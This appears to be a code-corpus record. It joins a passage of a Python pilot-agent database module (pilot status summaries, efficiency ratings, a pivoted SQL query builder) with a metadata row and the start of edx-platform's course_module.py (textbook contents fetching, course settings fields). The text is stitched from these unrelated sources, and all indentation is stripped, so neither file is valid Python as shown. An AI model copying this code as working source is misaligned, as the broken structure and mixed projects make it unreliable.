# Spin off the method getPilotSummary. It is doing things in such a way that
# do not make much sense. This method returns the pilots that were updated in the
# time window [ startTimeWindow, endTimeWindow ), if they are present.
# """
#
# sqlSelect = 'SELECT DestinationSite,Status,count(Status) FROM PilotAgents'
#
# whereSelect = []
#
# if startTimeWindow is not None:
# whereSelect.append( ' LastUpdateTime >= "%s"' % startTimeWindow )
# if endTimeWindow is not None:
# whereSelect.append( ' LastUpdateTime < "%s"' % endTimeWindow )
# if ce:
# whereSelect.append( ' DestinationSite = "%s"' % ce )
#
# if whereSelect:
# sqlSelect += ' WHERE'
# sqlSelect += ' AND'.join( whereSelect )
#
# sqlSelect += ' GROUP BY DestinationSite,Status'
#
# resSelect = self._query( sqlSelect )
# if not resSelect[ 'OK' ]:
# return resSelect
#
# result = { 'Total' : collections.defaultdict( int ) }
#
# for row in resSelect[ 'Value' ]:
#
# ceName, statusName, statusCount = row
#
# if not ceName in result:
# result[ ceName ] = {}
# result[ ceName ][ statusName ] = int( statusCount )
#
# result[ 'Total' ][ statusName ] += int( statusCount )
#
# return S_OK( result )
##########################################################################################
def getGroupedPilotSummary(self, selectDict, columnList):
"""
The simplified pilot summary based on getPilotSummaryWeb method. It calculates pilot efficiency
based on the same algorithm as in the Web version, basically takes into account Done and
Aborted pilots only from the last day. The selection is done entirely in SQL.
:param dict selectDict: A dictionary to pass additional conditions to select statements, i.e.
it allows to define start time for Done and Aborted Pilots.
:param list columnList: A list of column to consider when grouping to calculate efficiencies.
e.g. ['GridSite', 'DestinationSite'] is used to calculate efficiencies
for sites and CEs. If we want to add an OwnerGroup it would be:
['GridSite', 'DestinationSite', 'OwnerGroup'].
:return: S_OK/S_ERROR with a dict containing the ParameterNames and Records lists.
"""
table = PivotedPilotSummaryTable(columnList)
sqlQuery = table.buildSQL()
self.logger.debug("SQL query : ")
self.logger.debug("\n" + sqlQuery)
res = self._query(sqlQuery)
if not res['OK']:
return res
self.logger.info(res)
# TODO add site or CE status, while looping
rows = []
columns = table.getColumnList()
try:
groupIndex = columns.index('OwnerGroup')
# should probably change a column name to VO here as well to avoid confusion
except ValueError:
groupIndex = None
result = {'ParameterNames': columns}
multiple = False
# If not grouped by CE:
if 'CE' not in columns:
multiple = True
for row in res['Value']:
lrow = list(row)
if groupIndex:
lrow[groupIndex] = getVOForGroup(row[groupIndex])
if multiple:
lrow.append('Multiple')
for index, value in enumerate(row):
if isinstance(value, decimal.Decimal):
lrow[index] = float(value)
# get the value of the Total column
if 'Total' in columnList:
total = lrow[columnList.index('Total')]
else:
total = 0
if 'PilotJobEff' in columnList:
eff = lrow[columnList.index('PilotJobEff')]
else:
eff = 0.
lrow.append(self._getElementStatus(total, eff))
rows.append(list(lrow))
# If not grouped by CE and more then 1 CE in the result:
if multiple:
columns.append('CE') # 'DestinationSite' re-mapped to 'CE' already
columns.append('Status')
result['Records'] = rows
return S_OK(result)
def _getElementStatus(self, total, eff):
"""
Assign status to a site or resource based on pilot efficiency.
:param total: number of pilots to assign the status, otherwise 'Idle'
:param eff: efficiency in %
:return: status string
"""
# Evaluate the quality status of the Site/CE
if total > 10:
if eff < 25.:
return 'Bad'
elif eff < 60.:
return 'Poor'
elif eff < 85.:
return 'Fair'
else:
return 'Good'
else:
return 'Idle'
def getPilotSummaryWeb(self, selectDict, sortList, startItem, maxItems):
""" Get summary of the pilot jobs status by CE/site in a standard structure
"""
stateNames = ['Submitted', 'Ready', 'Scheduled', 'Waiting', 'Running', 'Done', 'Aborted', 'Failed']
allStateNames = stateNames + ['Done_Empty', 'Aborted_Hour']
paramNames = ['Site', 'CE'] + allStateNames
last_update = None
if 'LastUpdateTime' in selectDict:
last_update = selectDict['LastUpdateTime']
del selectDict['LastUpdateTime']
site_select = []
if 'GridSite' in selectDict:
site_select = selectDict['GridSite']
if not isinstance(site_select, list):
site_select = [site_select]
del selectDict['GridSite']
status_select = []
if 'Status' in selectDict:
status_select = selectDict['Status']
if not isinstance(status_select, list):
status_select = [status_select]
del selectDict['Status']
expand_site = ''
if 'ExpandSite' in selectDict:
expand_site = selectDict['ExpandSite']
site_select = [expand_site]
del selectDict['ExpandSite']
# Get all the data from the database with various selections
result = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not result['OK']:
return result
last_update = Time.dateTime() - Time.hour
selectDict['Status'] = 'Aborted'
resultHour = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultHour['OK']:
return resultHour
last_update = Time.dateTime() - Time.day
selectDict['Status'] = ['Aborted', 'Done']
resultDay = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultDay['OK']:
return resultDay
selectDict['CurrentJobID'] = 0
selectDict['Status'] = 'Done'
resultDayEmpty = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultDayEmpty['OK']:
return resultDayEmpty
ceMap = {}
resMap = getCESiteMapping()
if resMap['OK']:
ceMap = resMap['Value']
# Sort out different counters
resultDict = {}
resultDict['Unknown'] = {}
for attDict, count in result['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce != "Multiple" and ce in ceMap:
site = ceMap[ce]
if site not in resultDict:
resultDict[site] = {}
if ce not in resultDict[site]:
resultDict[site][ce] = {}
for p in allStateNames:
resultDict[site][ce][p] = 0
resultDict[site][ce][state] = count
for attDict, count in resultDay['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Done":
resultDict[site][ce]["Done"] = count
if state == "Aborted":
resultDict[site][ce]["Aborted"] = count
for attDict, count in resultDayEmpty['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Done":
resultDict[site][ce]["Done_Empty"] = count
for attDict, count in resultHour['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Aborted":
resultDict[site][ce]["Aborted_Hour"] = count
records = []
siteSumDict = {}
for site in resultDict:
sumDict = {}
for state in allStateNames:
if state not in sumDict:
sumDict[state] = 0
sumDict['Total'] = 0
for ce in resultDict[site]:
itemList = [site, ce]
total = 0
for state in allStateNames:
itemList.append(resultDict[site][ce][state])
sumDict[state] += resultDict[site][ce][state]
if state == "Done":
done = resultDict[site][ce][state]
if state == "Done_Empty":
empty = resultDict[site][ce][state]
if state == "Aborted":
aborted = resultDict[site][ce][state]
if state != "Aborted_Hour" and state != "Done_Empty":
total += resultDict[site][ce][state]
sumDict['Total'] += total
# Add the total number of pilots seen in the last day
itemList.append(total)
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
itemList.append('%.2f' % eff)
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
itemList.append('%.2f' % eff)
# Evaluate the quality status of the CE
if total > 10:
if eff < 25.:
itemList.append('Bad')
elif eff < 60.:
itemList.append('Poor')
elif eff < 85.:
itemList.append('Fair')
else:
itemList.append('Good')
else:
itemList.append('Idle')
if len(resultDict[site]) == 1 or expand_site:
records.append(itemList)
if len(resultDict[site]) > 1 and not expand_site:
itemList = [site, 'Multiple']
for state in allStateNames + ['Total']:
if state in sumDict:
itemList.append(sumDict[state])
else:
itemList.append(0)
done = sumDict["Done"]
empty = sumDict["Done_Empty"]
aborted = sumDict["Aborted"]
total = sumDict["Total"]
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
itemList.append('%.2f' % eff)
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
itemList.append('%.2f' % eff)
# Evaluate the quality status of the Site
if total > 10:
if eff < 25.:
itemList.append('Bad')
elif eff < 60.:
itemList.append('Poor')
elif eff < 85.:
itemList.append('Fair')
else:
itemList.append('Good')
else:
itemList.append('Idle')
records.append(itemList)
for state in allStateNames + ['Total']:
if state not in siteSumDict:
siteSumDict[state] = sumDict[state]
else:
siteSumDict[state] += sumDict[state]
# Perform site selection
if site_select:
new_records = []
for r in records:
if r[0] in site_select:
new_records.append(r)
records = new_records
# Perform status selection
if status_select:
new_records = []
for r in records:
if r[14] in status_select:
new_records.append(r)
records = new_records
# Get the Site Mask data
result = SiteStatus().getUsableSites()
if result['OK']:
siteMask = result['Value']
for r in records:
if r[0] in siteMask:
r.append('Yes')
else:
r.append('No')
else:
for r in records:
r.append('Unknown')
finalDict = {}
finalDict['TotalRecords'] = len(records)
finalDict['ParameterNames'] = paramNames + \
['Total', 'PilotsPerJob', 'PilotJobEff', 'Status', 'InMask']
# Return all the records if maxItems == 0 or the specified number otherwise
if maxItems:
finalDict['Records'] = records[startItem:startItem + maxItems]
else:
finalDict['Records'] = records
done = siteSumDict["Done"]
empty = siteSumDict["Done_Empty"]
aborted = siteSumDict["Aborted"]
total = siteSumDict["Total"]
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
siteSumDict['PilotsPerJob'] = '%.2f' % eff
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
siteSumDict['PilotJobEff'] = '%.2f' % eff
# Evaluate the overall quality status
if total > 100:
if eff < 25.:
siteSumDict['Status'] = 'Bad'
elif eff < 60.:
siteSumDict['Status'] = 'Poor'
elif eff < 85.:
siteSumDict['Status'] = 'Fair'
else:
siteSumDict['Status'] = 'Good'
else:
siteSumDict['Status'] = 'Idle'
finalDict['Extras'] = siteSumDict
return S_OK(finalDict)
##########################################################################################
def getPilotMonitorSelectors(self):
""" Get distinct values for the Pilot Monitor page selectors
"""
paramNames = ['OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'GridSite']
resultDict = {}
for param in paramNames:
result = self.getDistinctAttributeValues('PilotAgents', param)
if result['OK']:
resultDict[param] = result['Value']
else:
resultDict = []
if param == "OwnerDN":
userList = []
for dn in result['Value']:
resultUser = getUsernameForDN(dn)
if resultUser['OK']:
userList.append(resultUser['Value'])
resultDict["Owner"] = userList
return S_OK(resultDict)
##########################################################################################
def getPilotMonitorWeb(self, selectDict, sortList, startItem, maxItems):
""" Get summary of the pilot job information in a standard structure
"""
resultDict = {}
if 'LastUpdateTime' in selectDict:
del selectDict['LastUpdateTime']
if 'Owner' in selectDict:
userList = selectDict['Owner']
if not isinstance(userList, list):
userList = [userList]
dnList = []
for uName in userList:
uList = getDNForUsername(uName)['Value']
dnList += uList
selectDict['OwnerDN'] = dnList
del selectDict['Owner']
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdateTime', None)
if startDate:
del selectDict['LastUpdateTime']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
# Sorting instructions. Only one for the moment.
if sortList:
orderAttribute = sortList[0][0] + ":" + sortList[0][1]
else:
orderAttribute = None
# Select pilots for the summary
result = self.selectPilots(
selectDict,
orderAttribute=orderAttribute,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
if not result['OK']:
return S_ERROR('Failed to select pilots: ' + result['Message'])
pList = result['Value']
nPilots = len(pList)
resultDict['TotalRecords'] = nPilots
if nPilots == 0:
return S_OK(resultDict)
ini = startItem
last = ini + maxItems
if ini >= nPilots:
return S_ERROR('Item number out of range')
if last > nPilots:
last = nPilots
pilotList = pList[ini:last]
paramNames = ['PilotJobReference', 'OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'BenchMark', 'ParentID',
'SubmissionTime', 'PilotID', 'LastUpdateTime', 'CurrentJobID', 'TaskQueueID',
'GridSite']
result = self.getPilotInfo(pilotList, paramNames=paramNames)
if not result['OK']:
return S_ERROR('Failed to get pilot info: ' + result['Message'])
pilotDict = result['Value']
records = []
for pilot in pilotList:
parList = []
for parameter in paramNames:
if not isinstance(pilotDict[pilot][parameter], six.integer_types):
parList.append(str(pilotDict[pilot][parameter]))
else:
parList.append(pilotDict[pilot][parameter])
if parameter == 'GridSite':
gridSite = pilotDict[pilot][parameter]
# If the Grid Site is unknown try to recover it in the last moment
if gridSite == "Unknown":
ce = pilotDict[pilot]['DestinationSite']
result = getCESiteMapping(ce)
if result['OK']:
gridSite = result['Value'].get(ce)
del parList[-1]
parList.append(gridSite)
records.append(parList)
resultDict['ParameterNames'] = paramNames
resultDict['Records'] = records
return S_OK(resultDict)
class PivotedPilotSummaryTable:
"""
The class creates a 'pivoted' table by combining records with the same group
of self.columnList into a single row. It allows an easy calculation of pilot efficiencies.
"""
pstates = ['Submitted', 'Done', 'Failed', 'Aborted',
'Running', 'Waiting', 'Scheduled', 'Ready']
def __init__(self, columnList):
"""
Initialise a table with columns to be grouped by.
:param columnList: i.e. ['GridSite', 'DestinationSite']
:return:
"""
self.columnList = columnList
# we want 'Site' and 'CE' in the final result
colMap = {'GridSite': 'Site', 'DestinationSite': 'CE'}
self._columns = [colMap.get(val, val) for val in columnList]
self._columns += self.pstates # MySQL._query() does not give us column names, sadly.
def buildSQL(self, selectDict=None):
"""
Build an SQL query to create a table with all status counts in one row, ("pivoted")
grouped by columns in the column list.
:param dict selectDict:
:return: SQL query
"""
lastUpdate = Time.dateTime() - Time.day
pvtable = 'pivoted'
innerGroupBy = "(SELECT %s, Status,\n " \
"count(CASE WHEN CurrentJobID=0 THEN 1 END) AS Empties," \
" count(*) AS qty FROM PilotAgents\n " \
"WHERE Status NOT IN ('Done', 'Aborted') OR (Status in ('Done', 'Aborted') \n" \
" AND \n" \
" LastUpdateTime > '%s')" \
" GROUP by %s, Status)\n AS %s" % (
_quotedList(self.columnList), lastUpdate,
_quotedList(self.columnList), pvtable)
# pivoted table: combine records with the same group of self.columnList into a single row.
pivotedQuery = "SELECT %s,\n" % ', '.join([pvtable + '.' + item for item in self.columnList])
lineTemplate = " SUM(if (pivoted.Status={state!r}, pivoted.qty, 0)) AS {state}"
pivotedQuery += ',\n'.join(lineTemplate.format(state=state) for state in self.pstates)
pivotedQuery += ",\n SUM(if (%s.Status='Done', %s.Empties,0)) AS Done_Empty,\n" \
" SUM(%s.qty) AS Total " \
"FROM\n" % (pvtable, pvtable, pvtable)
outerGroupBy = " GROUP BY %s) \nAS pivotedEff;" % _quotedList(self.columnList)
# add efficiency columns using aliases defined in the pivoted table
effCase = "(CASE\n WHEN pivotedEff.Done - pivotedEff.Done_Empty > 0 \n" \
" THEN pivotedEff.Done/(pivotedEff.Done-pivotedEff.Done_Empty) \n" \
" WHEN pivotedEff.Done=0 THEN 0 \n" \
" WHEN pivotedEff.Done=pivotedEff.Done_Empty \n" \
" THEN 99.0 ELSE 0.0 END) AS PilotsPerJob,\n" \
" (pivotedEff.Total - pivotedEff.Aborted)/pivotedEff.Total*100.0 AS PilotJobEff \nFROM \n("
effSelectTemplate = " CAST(pivotedEff.{state} AS UNSIGNED) AS {state} "
# now select the columns + states:
pivotedEff = "SELECT %s,\n" % ', '.join(['pivotedEff' + '.' + item for item in self.columnList]) + \
', '.join(effSelectTemplate.format(state=state) for state in self.pstates + ['Total']) + ", \n"
finalQuery = pivotedEff + effCase + pivotedQuery + innerGroupBy + outerGroupBy
self._columns += ['Total', 'PilotsPerJob', 'PilotJobEff']
return finalQuery
def getColumnList(self):
return self._columns
| gpl-3.0 | 8,148,434,752,963,911,000 | 34.197874 | 119 | 0.572793 | false |
Endika/edx-platform | common/lib/xmodule/xmodule/course_module.py | 1 | 56725 | """
Django module container for classes and operations related to the "Course Module" content type
"""
import json
import logging
from cStringIO import StringIO
from datetime import datetime
import requests
from django.utils.timezone import UTC
from lazy import lazy
from lxml import etree
from path import Path as path
from xblock.core import XBlock
from xblock.fields import Scope, List, String, Dict, Boolean, Integer, Float
from xmodule import course_metadata_utils
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from xmodule.exceptions import UndefinedContext
from xmodule.graders import grader_from_conf
from xmodule.mixin import LicenseMixin
from xmodule.seq_module import SequenceDescriptor, SequenceModule
from xmodule.tabs import CourseTabList, InvalidTabsException
from .fields import Date
log = logging.getLogger(__name__)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
CATALOG_VISIBILITY_CATALOG_AND_ABOUT = "both"
CATALOG_VISIBILITY_ABOUT = "about"
CATALOG_VISIBILITY_NONE = "none"
class StringOrDate(Date):
def from_json(self, value):
"""
Parse an optional metadata key containing a time or a string:
if present, assume it's a string if it doesn't parse.
"""
try:
result = super(StringOrDate, self).from_json(value)
except ValueError:
return value
if result is None:
return value
else:
return result
def to_json(self, value):
"""
Convert a time struct or string to a string.
"""
try:
result = super(StringOrDate, self).to_json(value)
except:
return value
if result is None:
return value
else:
return result
edx_xml_parser = etree.XMLParser(dtd_validation=False, load_dtd=False,
remove_comments=True, remove_blank_text=True)
_cached_toc = {}
class Textbook(object):
def __init__(self, title, book_url):
self.title = title
self.book_url = book_url
@lazy
def start_page(self):
return int(self.table_of_contents[0].attrib['page'])
@lazy
def end_page(self):
# The last page should be the last element in the table of contents,
# but it may be nested. So recurse all the way down the last element
last_el = self.table_of_contents[-1]
while last_el.getchildren():
last_el = last_el[-1]
return int(last_el.attrib['page'])
@lazy
def table_of_contents(self):
"""
Accesses the textbook's table of contents (default name "toc.xml") at the URL self.book_url
Returns XML tree representation of the table of contents
"""
toc_url = self.book_url + 'toc.xml'
# cdodge: I've added this caching of TOC because in Mongo-backed instances (but not Filesystem stores)
# course modules have a very short lifespan and are constantly being created and torn down.
# Since this module in the __init__() method does a synchronous call to AWS to get the TOC
# this is causing a big performance problem. So let's be a bit smarter about this and cache
# each fetch and store in-mem for 10 minutes.
# NOTE: I have to get this onto sandbox ASAP as we're having runtime failures. I'd like to swing back and
# rewrite to use the traditional Django in-memory cache.
try:
# see if we already fetched this
if toc_url in _cached_toc:
(table_of_contents, timestamp) = _cached_toc[toc_url]
age = datetime.now(UTC) - timestamp
# expire every 10 minutes
if age.seconds < 600:
return table_of_contents
except Exception as err:
pass
# Get the table of contents from S3
log.info("Retrieving textbook table of contents from %s", toc_url)
try:
r = requests.get(toc_url)
except Exception as err:
msg = 'Error %s: Unable to retrieve textbook table of contents at %s' % (err, toc_url)
log.error(msg)
raise Exception(msg)
# TOC is XML. Parse it
try:
table_of_contents = etree.fromstring(r.text)
except Exception as err:
msg = 'Error %s: Unable to parse XML for textbook table of contents at %s' % (err, toc_url)
log.error(msg)
raise Exception(msg)
return table_of_contents
def __eq__(self, other):
return (self.title == other.title and
self.book_url == other.book_url)
def __ne__(self, other):
return not self == other
class TextbookList(List):
def from_json(self, values):
textbooks = []
for title, book_url in values:
try:
textbooks.append(Textbook(title, book_url))
except:
# If we can't get to S3 (e.g. on a train with no internet), don't break
# the rest of the courseware.
log.exception("Couldn't load textbook ({0}, {1})".format(title, book_url))
continue
return textbooks
def to_json(self, values):
json_data = []
for val in values:
if isinstance(val, Textbook):
json_data.append((val.title, val.book_url))
elif isinstance(val, tuple):
json_data.append(val)
else:
continue
return json_data
class CourseFields(object):
lti_passports = List(
display_name=_("LTI Passports"),
help=_('Enter the passports for course LTI tools in the following format: "id:client_key:client_secret".'),
scope=Scope.settings
)
textbooks = TextbookList(
help=_("List of pairs of (title, url) for textbooks used in this course"),
default=[],
scope=Scope.content
)
wiki_slug = String(help=_("Slug that points to the wiki for this course"), scope=Scope.content)
enrollment_start = Date(help=_("Date that enrollment for this class is opened"), scope=Scope.settings)
enrollment_end = Date(help=_("Date that enrollment for this class is closed"), scope=Scope.settings)
start = Date(
help=_("Start time when this module is visible"),
default=DEFAULT_START_DATE,
scope=Scope.settings
)
end = Date(help=_("Date that this class ends"), scope=Scope.settings)
cosmetic_display_price = Integer(
display_name=_("Cosmetic Course Display Price"),
help=_(
"The cost displayed to students for enrolling in the course. If a paid course registration price is "
"set by an administrator in the database, that price will be displayed instead of this one."
),
default=0,
scope=Scope.settings,
)
advertised_start = String(
display_name=_("Course Advertised Start Date"),
help=_(
"Enter the date you want to advertise as the course start date, if this date is different from the set "
"start date. To advertise the set start date, enter null."
),
scope=Scope.settings
)
pre_requisite_courses = List(
display_name=_("Pre-Requisite Courses"),
help=_("Pre-Requisite Course key if this course has a pre-requisite course"),
scope=Scope.settings
)
grading_policy = Dict(
help=_("Grading policy definition for this class"),
default={
"GRADER": [
{
"type": "Homework",
"min_count": 12,
"drop_count": 2,
"short_label": "HW",
"weight": 0.15,
},
{
"type": "Lab",
"min_count": 12,
"drop_count": 2,
"weight": 0.15,
},
{
"type": "Midterm Exam",
"short_label": "Midterm",
"min_count": 1,
"drop_count": 0,
"weight": 0.3,
},
{
"type": "Final Exam",
"short_label": "Final",
"min_count": 1,
"drop_count": 0,
"weight": 0.4,
}
],
"GRADE_CUTOFFS": {
"Pass": 0.5,
},
},
scope=Scope.content
)
show_calculator = Boolean(
display_name=_("Show Calculator"),
help=_("Enter true or false. When true, students can see the calculator in the course."),
default=False,
scope=Scope.settings
)
display_name = String(
help=_("Enter the name of the course as it should appear in the edX.org course list."),
default="Empty",
display_name=_("Course Display Name"),
scope=Scope.settings
)
course_edit_method = String(
display_name=_("Course Editor"),
help=_('Enter the method by which this course is edited ("XML" or "Studio").'),
default="Studio",
scope=Scope.settings,
deprecated=True # Deprecated because someone would not edit this value within Studio.
)
tabs = CourseTabList(help="List of tabs to enable in this course", scope=Scope.settings, default=[])
end_of_course_survey_url = String(
display_name=_("Course Survey URL"),
help=_("Enter the URL for the end-of-course survey. If your course does not have a survey, enter null."),
scope=Scope.settings,
deprecated=True # We wish to remove this entirely, TNL-3399
)
discussion_blackouts = List(
display_name=_("Discussion Blackout Dates"),
help=_(
'Enter pairs of dates between which students cannot post to discussion forums. Inside the provided '
'brackets, enter an additional set of square brackets surrounding each pair of dates you add. '
'Format each pair of dates as ["YYYY-MM-DD", "YYYY-MM-DD"]. To specify times as well as dates, '
'format each pair as ["YYYY-MM-DDTHH:MM", "YYYY-MM-DDTHH:MM"]. Be sure to include the "T" between '
'the date and time. For example, an entry defining two blackout periods looks like this, including '
'the outer pair of square brackets: [["2015-09-15", "2015-09-21"], ["2015-10-01", "2015-10-08"]] '
),
scope=Scope.settings
)
discussion_topics = Dict(
display_name=_("Discussion Topic Mapping"),
help=_(
'Enter discussion categories in the following format: "CategoryName": '
'{"id": "i4x-InstitutionName-CourseNumber-course-CourseRun"}. For example, one discussion '
'category may be "Lydian Mode": {"id": "i4x-UniversityX-MUS101-course-2015_T1"}. The "id" '
'value for each category must be unique. In "id" values, the only special characters that are '
'supported are underscore, hyphen, and period.'
),
scope=Scope.settings
)
discussion_sort_alpha = Boolean(
display_name=_("Discussion Sorting Alphabetical"),
scope=Scope.settings, default=False,
help=_(
"Enter true or false. If true, discussion categories and subcategories are sorted alphabetically. "
"If false, they are sorted chronologically."
)
)
announcement = Date(
display_name=_("Course Announcement Date"),
help=_("Enter the date to announce your course."),
scope=Scope.settings
)
cohort_config = Dict(
display_name=_("Cohort Configuration"),
help=_(
"Enter policy keys and values to enable the cohort feature, define automated student assignment to "
"groups, or identify any course-wide discussion topics as private to cohort members."
),
scope=Scope.settings
)
is_new = Boolean(
display_name=_("Course Is New"),
help=_(
"Enter true or false. If true, the course appears in the list of new courses on edx.org, and a New! "
"badge temporarily appears next to the course image."
),
scope=Scope.settings
)
mobile_available = Boolean(
display_name=_("Mobile Course Available"),
help=_("Enter true or false. If true, the course will be available to mobile devices."),
default=False,
scope=Scope.settings
)
video_upload_pipeline = Dict(
display_name=_("Video Upload Credentials"),
help=_("Enter the unique identifier for your course's video files provided by edX."),
scope=Scope.settings
)
no_grade = Boolean(
display_name=_("Course Not Graded"),
help=_("Enter true or false. If true, the course will not be graded."),
default=False,
scope=Scope.settings
)
disable_progress_graph = Boolean(
display_name=_("Disable Progress Graph"),
help=_("Enter true or false. If true, students cannot view the progress graph."),
default=False,
scope=Scope.settings
)
pdf_textbooks = List(
display_name=_("PDF Textbooks"),
help=_("List of dictionaries containing pdf_textbook configuration"), scope=Scope.settings
)
html_textbooks = List(
display_name=_("HTML Textbooks"),
help=_(
"For HTML textbooks that appear as separate tabs in the courseware, enter the name of the tab (usually "
"the name of the book) as well as the URLs and titles of all the chapters in the book."
),
scope=Scope.settings
)
remote_gradebook = Dict(
display_name=_("Remote Gradebook"),
help=_(
"Enter the remote gradebook mapping. Only use this setting when "
"REMOTE_GRADEBOOK_URL has been specified."
),
scope=Scope.settings
)
enable_ccx = Boolean(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content. CCX Coach is
# a role created by a course Instructor to enable a person (the "Coach") to manage the custom course for
# his students.
display_name=_("Enable CCX"),
help=_(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content. CCX Coach is
# a role created by a course Instructor to enable a person (the "Coach") to manage the custom course for
# his students.
"Allow course instructors to assign CCX Coach roles, and allow coaches to manage Custom Courses on edX."
" When false, Custom Courses cannot be created, but existing Custom Courses will be preserved."
),
default=False,
scope=Scope.settings
)
ccx_connector = String(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content.
display_name=_("CCX Connector URL"),
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content.
help=_(
"URL for CCX Connector application for managing creation of CCXs. (optional)."
" Ignored unless 'Enable CCX' is set to 'true'."
),
scope=Scope.settings, default=""
)
allow_anonymous = Boolean(
display_name=_("Allow Anonymous Discussion Posts"),
help=_("Enter true or false. If true, students can create discussion posts that are anonymous to all users."),
scope=Scope.settings, default=True
)
allow_anonymous_to_peers = Boolean(
display_name=_("Allow Anonymous Discussion Posts to Peers"),
help=_(
"Enter true or false. If true, students can create discussion posts that are anonymous to other "
"students. This setting does not make posts anonymous to course staff."
),
scope=Scope.settings, default=False
)
advanced_modules = List(
display_name=_("Advanced Module List"),
help=_("Enter the names of the advanced components to use in your course."),
scope=Scope.settings
)
has_children = True
info_sidebar_name = String(
display_name=_("Course Home Sidebar Name"),
help=_(
"Enter the heading that you want students to see above your course handouts on the Course Home page. "
"Your course handouts appear in the right panel of the page."
),
scope=Scope.settings, default=_('Course Handouts'))
show_timezone = Boolean(
help=_(
"True if timezones should be shown on dates in the courseware. "
"Deprecated in favor of due_date_display_format."
),
scope=Scope.settings, default=True
)
due_date_display_format = String(
display_name=_("Due Date Display Format"),
help=_(
"Enter the format for due dates. The default is Mon DD, YYYY. Enter \"%m-%d-%Y\" for MM-DD-YYYY, "
"\"%d-%m-%Y\" for DD-MM-YYYY, \"%Y-%m-%d\" for YYYY-MM-DD, or \"%Y-%d-%m\" for YYYY-DD-MM."
),
scope=Scope.settings, default=None
)
enrollment_domain = String(
display_name=_("External Login Domain"),
help=_("Enter the external login method students can use for the course."),
scope=Scope.settings
)
certificates_show_before_end = Boolean(
display_name=_("Certificates Downloadable Before End"),
help=_(
"Enter true or false. If true, students can download certificates before the course ends, if they've "
"met certificate requirements."
),
scope=Scope.settings,
default=False,
deprecated=True
)
certificates_display_behavior = String(
display_name=_("Certificates Display Behavior"),
help=_(
"Enter end, early_with_info, or early_no_info. After certificate generation, students who passed see a "
"link to their certificates on the dashboard and students who did not pass see information about the "
"grading configuration. The default is end, which displays this certificate information to all students "
"after the course end date. To display this certificate information to all students as soon as "
"certificates are generated, enter early_with_info. To display only the links to passing students as "
"soon as certificates are generated, enter early_no_info."
),
scope=Scope.settings,
default="end"
)
course_image = String(
display_name=_("Course About Page Image"),
help=_(
"Edit the name of the course image file. You must upload this file on the Files & Uploads page. "
"You can also set the course image on the Settings & Details page."
),
scope=Scope.settings,
# Ensure that courses imported from XML keep their image
default="images_course_image.jpg"
)
issue_badges = Boolean(
display_name=_("Issue Open Badges"),
help=_(
"Issue Open Badges badges for this course. Badges are generated when certificates are created."
),
scope=Scope.settings,
default=True
)
## Course level Certificate Name overrides.
cert_name_short = String(
help=_(
'Use this setting only when generating PDF certificates. '
'Between quotation marks, enter the short name of the type of certificate that '
'students receive when they complete the course. For instance, "Certificate".'
),
display_name=_("Certificate Name (Short)"),
scope=Scope.settings,
default=""
)
cert_name_long = String(
help=_(
'Use this setting only when generating PDF certificates. '
'Between quotation marks, enter the long name of the type of certificate that students '
'receive when they complete the course. For instance, "Certificate of Achievement".'
),
display_name=_("Certificate Name (Long)"),
scope=Scope.settings,
default=""
)
cert_html_view_enabled = Boolean(
display_name=_("Certificate Web/HTML View Enabled"),
help=_("If true, certificate Web/HTML views are enabled for the course."),
scope=Scope.settings,
default=False,
)
cert_html_view_overrides = Dict(
# Translators: This field is the container for course-specific certifcate configuration values
display_name=_("Certificate Web/HTML View Overrides"),
# Translators: These overrides allow for an alternative configuration of the certificate web view
help=_("Enter course-specific overrides for the Web/HTML template parameters here (JSON format)"),
scope=Scope.settings,
)
# Specific certificate information managed via Studio (should eventually fold other cert settings into this)
certificates = Dict(
# Translators: This field is the container for course-specific certifcate configuration values
display_name=_("Certificate Configuration"),
# Translators: These overrides allow for an alternative configuration of the certificate web view
help=_("Enter course-specific configuration information here (JSON format)"),
scope=Scope.settings,
)
